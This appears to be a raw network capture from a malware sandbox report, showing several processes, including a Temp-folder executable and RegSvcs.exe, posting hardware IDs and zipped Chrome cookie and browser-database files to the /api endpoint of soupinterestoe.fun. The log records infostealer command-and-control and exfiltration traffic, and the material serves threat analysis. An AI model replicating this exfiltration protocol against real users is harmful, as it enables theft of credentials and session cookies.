Dec 27, 2023 17:57:57.305481911 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:57.834609985 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=n29iakg9csb9nj308vrulv8eh9; expires=Sun, 21-Apr-2024 10:44:36 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S0pCUSLBY1mnt%2Bxfp4J2SbkIS8ekovccbAQ00qL%2BWDjR%2Fq6vPeta0NMVi1hx8x7Ibu6PvjRbb9FjTQtbw0s0DYwk%2FA9vK87aiYv8iCvjS2MbiDFPLOlBlQ93v1oEhqTOs%2FKeAwY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b0 Data Raw: Data Ascii:
Dec 27, 2023 17:57:57.834625006 CET	43	IN	Data Raw: 38 61 61 31 65 39 62 64 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 8aa1e9bd-DFW15Malformed packet data
Dec 27, 2023 17:57:57.834635973 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49774	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:57.316210032 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:57.316437960 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:57.852189064 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=pgiq294aj6nnui0mitivoqpplk; expires=Sun, 21-Apr-2024 10:44:36 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:57 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GQ473WNr%2BMyiyM4%2F9PriRCY9GnYbT8eFqCz%2BsBYB027B76Pi%2FPrprT53zZIbJw4nY0cmSw2n5cZ%2FEiqK%2BOoH8ZmgTcLgSQSeaDJWWF5HKsgdyZfvcmm2wOydL7zSos5QDeUpR7g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:57:57.852201939 CET	45	IN	Data Raw: 30 35 61 66 39 64 65 38 32 33 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 05af9de823-DFW15Malformed packet data
Dec 27, 2023 17:57:57.852212906 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49776	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:58.248080969 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:58.248172045 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:58.792131901 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=v398j2dccbdjs4p7ggjskvb699; expires=Sun, 21-Apr-2024 10:44:37 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qGqAOsFAqlk311OINnucnZa22oxq2gAf9CexVg%2FAfo%2FeWBHn7pxvpIyMdubtBMB2qCOAmJxPkC1azh%2F1bMhh0Ox7%2B5aU9T3UtW72jbSLNeQrTFXaawZIfH61bAcSeQbWnG%2FiXW8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b0 Data Raw: Data Ascii:
Dec 27, 2023 17:57:58.792151928 CET	43	IN	Data Raw: 37 66 30 30 34 36 38 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 7f004684-DFW15Malformed packet data
Dec 27, 2023 17:57:58.792165995 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:58.271379948 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 17:57:58.271544933 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:57:58.803119898 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=8u7cvfc7tmd3dlvked2o1di9td; expires=Sun, 21-Apr-2024 10:44:37 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:58 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s0spgxlv%2BzFMsBPnjzwPjrBInpjEZ273HeU9EaxsJTw6f8z8k%2FDzK0LncJ1WWzdbamJ1d7lpsQZgAI56X0LuDRsiMEnGPODGfqiwTuI3Q1Y2f7yqSCnHHcYaygszWIIBKYVjQBQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b0b9f8c6 Data Raw: Data Ascii:
Dec 27, 2023 17:57:58.803133011 CET	37	IN	Data Raw: 38 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 89-DFW15Malformed packet data
Dec 27, 2023 17:57:58.803145885 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49777	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:57:59.240443945 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:57:59.240497112 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:57:59.780168056 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:57:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=48ledb1tdpci2a19pi4vmo52gm; expires=Sun, 21-Apr-2024 10:44:38 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:57:59 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:57:59 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:57:59 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NLN0Au6MSZNGtxxX4zg6qncTntP7zPvncJDJZmAedeWiPJAjNGBsRiNgNytEHxqsZ4mJDUS1AgU9dmhGkoxkDb0cgQRKNLCRxnrpHyjjCpScy4ZAsVwdfpcpI6vUk1%2BPJswop8A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b11abb1aa7 Data Raw: Data Ascii:
Dec 27, 2023 17:57:59.780188084 CET	35	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: -DFW15Malformed packet data
Dec 27, 2023 17:57:59.780204058 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49779	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:00.633796930 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19685 Host: soupinterestoe.fun
Dec 27, 2023 17:58:00.633941889 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:00.755347013 CET	1286	OUT	Data Raw: dd 0e b9 ef 5c c9 49 eb 13 47 fb 51 ee 96 32 70 a4 dc 0d 19 c7 f7 ff 00 00 00 40 fa e0 eb 7f 56 98 14 fa 7e 9e 29 b2 8f 63 38 10 fa 87 85 0b 85 27 cf 86 f2 83 83 92 9b 19 1c dc 7c 27 cf d8 1c e4 dc 73 b5 6d fe f7 c0 d4 d9 95 ff 55 cc 49 cd ac 57 Data Ascii: \IGQ2p@V~)c8'\|'smUIWa<5*;\|0.wjibdU(?kbFm7nlog&ntmbf1f?2!ijud/s#vT>f!opwww')[i2R2f
Dec 27, 2023 17:58:00.755462885 CET	2572	OUT	Data Raw: 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 00 04 00 43 68 72 6f 6d 65 2f 44 65 66 61 75 6c 74 2f 4e 65 74 77 6f 72 6b 2f 43 6f 6f 6b 69 65 73 01 00 00 00 ed 9c 07 58 13 59 bb c7 27 94 10 08 21 22 5d 40 10 44 51 4a e8 45 44 Data Ascii: Chrome/Default/Network/CookiesXY'!"]@DQJEDM1IBQ(; 6\\|bU.boX^QEQ;D{w~>!9314e\|P[[KC~i}5X5hB?Z:f(y0W
Dec 27, 2023 17:58:00.755482912 CET	2572	OUT	Data Raw: 5b 48 27 d6 fc b6 f9 ae 01 f6 81 59 c7 4b 8f 3c ab 60 d6 20 a9 ab 70 89 cb 56 2f 1f 59 c4 ab a6 1d 25 f9 07 96 25 95 17 6e b9 17 53 bb c5 0c c5 1f 3e b5 3a 69 b2 b2 08 ad dd 1b 5d 54 ba 54 b1 0a 1f 66 e2 8d 95 5f 03 91 03 0b f0 e4 da c5 81 83 2c Data Ascii: [H'YK<` pV/Y%%nS>:i]TTf_,XxQw'Fscxf\|m7-8+Tyr]Ej[_'wh7g2I]M izF,w1nEJXZ%Y+[iU`E*Zfiq
Dec 27, 2023 17:58:00.755553007 CET	1681	OUT	Data Raw: 52 45 4e 54 01 00 00 00 f3 75 f4 f3 74 73 0d 0e d1 35 00 01 43 2e 00 50 4b 07 08 be 72 ea 90 0f 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 04 00 43 68 72 6f 6d Data Ascii: RENTuts5C.PKrPKChrome/Default/BrowserDB/LOG0ha#DD.US9Pg=o<r18`<,IHaY#j<<g;dua j2Z\|=ZA
Dec 27, 2023 17:58:01.204977036 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=6t647rq34q5i5800d91947b6mj; expires=Sun, 21-Apr-2024 10:44:40 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F6SHRl1%2FrKNtGmVu7bLu1r8ukcwz0w8jvfNUPsnXi6g1dAMLXCN7bzORoJF9DjleTezM0Hu0pIfVamkuz5%2FosKFZbevfX3vIuvUcpzxmRXXepR%2F%2F2lGtD%2FJVMTEePMY7DwnkR%2BY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31 Data Raw: Data Ascii:
Dec 27, 2023 17:58:01.204996109 CET	38	IN	Data Raw: 31 61 35 39 32 63 36 62 63 65 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 1a592c6bce-DFWfok 212.102.41.2
Dec 27, 2023 17:58:01.205008030 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49782	104.21.24.252	80	7544	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:01.452956915 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=fG.WDRwoO91HZkEjd7zHT7yYUTzjRYTzYsccxZAM2cU-1703696270-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 520 Host: soupinterestoe.fun
Dec 27, 2023 17:58:01.453021049 CET	520	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 39 38 44 31 41 33 45 41 41 44 31 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A798D1A3EAAD13029941599DCB3BA964--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 17:58:01.856595993 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 16:58:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=4dkho6t4qjn4elv8rek1ua2qct; expires=Sun, 21-Apr-2024 10:44:40 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 16:58:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 16:58:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 16:58:01 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dKZhP%2BNB5DJKyyDRjbEoWxREyO%2Bm20TgyA2dJYJNglOQljXKxvPF92ANNobIXtxFBdEBKO8r8VHU8ur6YDZl9rnr%2Fi3yqqI1tlRg5AK4dVXmbqcXitKSvvb3qOFS%2F9qe3Vp1hxM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c31b1f7 Data Raw: Data Ascii:
Dec 27, 2023 17:58:01.856611013 CET	41	IN	Data Raw: 32 66 36 39 39 34 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 2f6994-DFW15Malformed packet data
Dec 27, 2023 17:58:01.856621981 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49784	104.21.24.252	80	7380	C:\Users\user\AppData\Local\Temp\5A58.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 17:58:01.901814938 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=GRBHCNg2EAZnWl1HpTiwQFq2_duhbL4fOpIhqNZ4fig-1703696269-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 24320 Host: soupinterestoe.fun
Dec 27, 2023 17:58:01.901993036 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 61 37 39 38 64 31 61 33 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2a798d1a30000599d130261f60764u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 17:58:02.023276091 CET	3858	OUT	Data Raw: 2e 1a b4 85 d3 27 af f7 ca f1 1a 82 6b b5 74 cd 61 b3 4a 62 28 57 e8 a3 1e bc e1 fb 37 37 5a 72 3a 20 0a 9c d4 26 de 13 d8 9d 4b 04 22 ba 93 8b c0 3c 20 30 db 9e 0e 4d 3d 82 ef 45 d5 f0 86 63 2e 5d 2d 51 fc b7 66 a8 f8 06 5d f4 68 d3 1f 02 a1 8e Data Ascii: .'ktaJb(W77Zr: &K"< 0M=Ec.]-Qf]hOfB$.xxa{MvFsTSneG!B7zHyWN=k;`awY,fSls43{ aPs`QvSMKR-S'k %tHh/5tapp
Dec 27, 2023 17:58:02.023412943 CET	8888	OUT	Data Raw: d9 40 a9 7f bf 7f 32 6b 09 9f 08 9f e4 ce 08 20 75 ac 7e 98 93 b4 f9 a4 83 d7 c2 a7 79 f9 67 bc 79 07 e4 d9 4a 31 29 e6 52 6b f5 03 51 9a 9f cf 1c 14 0f 9d 1a 16 96 4b 0a bf 98 78 9a 58 58 2a 7a b2 d8 b8 1c 3e 6c 2e 38 57 ae 7b 1e 22 b1 68 99 6a Data Ascii: @2k u~ygyJ1)RkQKxXXz>l.8W{"hj?;O''[(I/HE\hjXL>_T760Qgf!]wlgC)8tjZ%UzZH)G'%D\|@2<U$%"I=j.zgL
